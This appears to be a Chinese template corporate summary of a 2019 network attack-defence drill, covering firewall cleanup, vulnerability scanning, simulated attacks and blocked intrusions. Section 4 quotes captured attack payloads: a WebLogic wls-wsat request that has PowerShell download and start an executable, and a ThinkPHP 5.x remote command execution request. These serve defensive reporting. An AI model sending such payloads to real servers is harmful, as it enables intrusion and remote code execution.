信息安全防护工作工作总结报告范例

以攻促防，全方位保障公司信息安全--2019年xx行动工作总结为深入贯彻习近平总书记关于网络强国的重要思想，坚持网络安全为人民，网络安全靠人民，同时按照XX〔2019〕70号【关于做好“网络攻防演习”行动的紧急通知】，以及XX集团XX字〔2019〕110号文件，XX精心组织，有效应对，圆满完成本次为期三周的网络安全攻防演练。此次攻防演练，通过开展敏感信息清理、网络资产摸底清理、收敛网络攻击暴露面、安全风险排查整改、重点目标防御等工作，进一步健全完善了网络安全事件监测发现、通报预警、应急处置一体化机制，提升了技术防护能力和安全管理水平，取得了很好的效果。本次演习活动中，防守团队将防护过程中的安全保障工作作为重点工作，通过攻击监测、攻击分析、攻击阻断、漏洞修复和追踪溯源等方式，实现了WEB应用防火墙拦截各类中、高级攻击16800余次，日均拦截攻击800余次，漏洞情报分享10余个，监测发现10000余次未成功的漏洞扫描行为，封堵IP100余个，成功抵御了攻击方的全部攻击行为。以下为本次攻防演习行动的详细工作总结。1.高度重视，精心组织，领导有方公司领导高度重视，切实要求提高政治站位，认清网络安全形势，坚决防范网络安全重大风险，坚决遏制网络安全重大事故，并确定分管领导X总为本次网络安全行动的责任人，签订网络安全责任书，由XX部XX总作为指挥协调负责人，成立“护网行动”统一指挥管理中心，统一协调调度指挥行动中的所有事项、人员安排工作，组建由信息安全人员、网络和系统运维人员、各业务系统人员、第三方单位运维人员组成的日常维护小组、态势监控小组、应急响应小组，明确并落实各方安全责任。2.查漏补缺，全面的风险评估工作小组从物理环境、通信网络、区域边界、计算环境四个层面对整个网络、系统进行全面的资产梳理，形成详细的调研表，其中包括资产统计、网络区域划分、各区域互访、数据传输等方面，正式梳理IT资产及相关供应商名录，明确并落实供应商安全责任，加强外包人员监督管理，开展在网运行系统和设备安全日常维护；2.1防火墙策略梳理对于公司内的资产信息，对防火墙对外映射策略进行梳理。原则如下：已经下线的系统，梳理防火墙映射策略，该停用的坚决停用；对测试系统已经分配了互联网访问权限进行梳理，该取消访问的就取消；已经上线的业务系统，梳理其映射端口，只保留业务相关必须使用端口；杜绝管理端口在互联网上暴露，如SSH、远程桌面等。按照上述原则梳理防火墙策略，下线测试服务器5台，关闭专线内网的3389、445端口访问等。通过调整优化防火墙、WAF策略进行监测、防护，对数据中心应用资源信息，明确访问IP地址、服务，严格按照最小权限原则配置防火墙安全策略，提升了整体数据中心的安全性。2.2主机漏洞扫描依据资产台账，完成各类账户弱口令、唯一性、存储方式等的排查。并对所有主机进行漏洞扫描，扫描主机数为384台，发现高危漏洞50余个。网段主机数量xx166xx137xx56xx25根据漏洞扫描结果，进行有针对性的安全加固工作，重点关注操作系统或中间件存在高风险漏洞，如weblogic反序列化、struts2漏洞、永恒之蓝漏洞等，对DNS、邮件等重要服务器安装windows远程桌面及Exchange漏洞补丁，对全景计划系统等安装Weblogic漏洞补丁等。3.知己知彼，模拟攻防演练不知攻，焉能防？本次行动中，工作小组组织一次了模拟攻击(针对整网),一方攻击,一方防守,磨合队伍,熟悉应急处置流程，发现了商业系统的多个高危漏洞，具体如下：系统漏洞危害xx管理平台管理员弱口令可以直接查看所有商业的能耗情况xx管理平台sql注入漏洞黑客可以直接通过修改参数获取整个数据库xx官网sql注入漏洞黑客可以直接通过修改参数登陆后台，并篡改官网页面，存在较大品牌风险xx官网sql注入漏洞可以获取数据库信息经过整改，上述业务系统已经修复漏洞，并要求供应商加强安全投入，举一反三，对开发过程中的代码进行安全评审，杜绝类似漏洞发生。4.红蓝对抗，快速响应，追踪溯源态势监控小组负责24小时监控分析网络流量和行为，实时发现来自各地的攻击行为并回溯分析，发现的多次攻击行为如下：4.1利用weblogic漏洞的攻击监控小组发现多个针对weblogic漏洞攻击的扫描行为，攻击者通过探测7101端口的weblogic服务，意图通过触发恶意代码下载，植入木马等方式进行攻击，攻击代码如下：POST/wls-wsat/CoordinatorPortType11stringpowershell(new-objectSystem.Net.WebClient).DownloadFile(');start%SystemRoot%/Temp/prkpmqinhewogxg14808.exe/string通过防火墙和WAF拦截策略配置以及日志显示，上述攻击均被成功拦截。4.2利用thinkphp漏洞的攻击监控小组发现多个针对ThinkPHP5.x远程命令执行漏洞扫描行为，采用实例化thinkphp方法来达到远程执行shell脚本的目的，攻击代码如下：节点1:IP地址=125.84.176.29,TCP端口=24498节点2:IP地址=xx,TCP端口=80GET/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=netstat-anHTTP/1.1Host:210.75.20.44User-Agent:Mozilla/5.0(Linux;Android6.0;Nexus5Build/MRA58N)AppleWebKit/537.36(KHTML,likeGecko)Chrome/73.0.3683.103MobileSafari/537.36通过防火墙和WAF拦截策略配置以及日志显示，上述攻击均被成功拦截。4.3利用TCP三次握手漏洞的DDOS攻击6月18日，多个业务系统反馈访问缓慢，响应异常，经过定位发现来自澳大利亚的大量IP对我司多个站点进行DDOS攻击，造成防火墙及业务系统服务器响应超时。经过在防火墙上紧急进行策略优化，将来自海外的IP均进行拦截封堵，之后成功缓存，业务系统均反馈访问正常。5.威胁情报6.工作总结此次演习已经结束，但网络攻击永远不会结束。我们将加强经验总结，把活动效益最大化，不断总结攻击技战法，提高攻击防护水平，加强对攻击行为的捕获、分析、识别、溯源、防止等，进而促进防御能力提升，真正达到以攻促防，全方位保障公司信息安全的目标，为提高整个国家网络对抗和防御能力做贡献。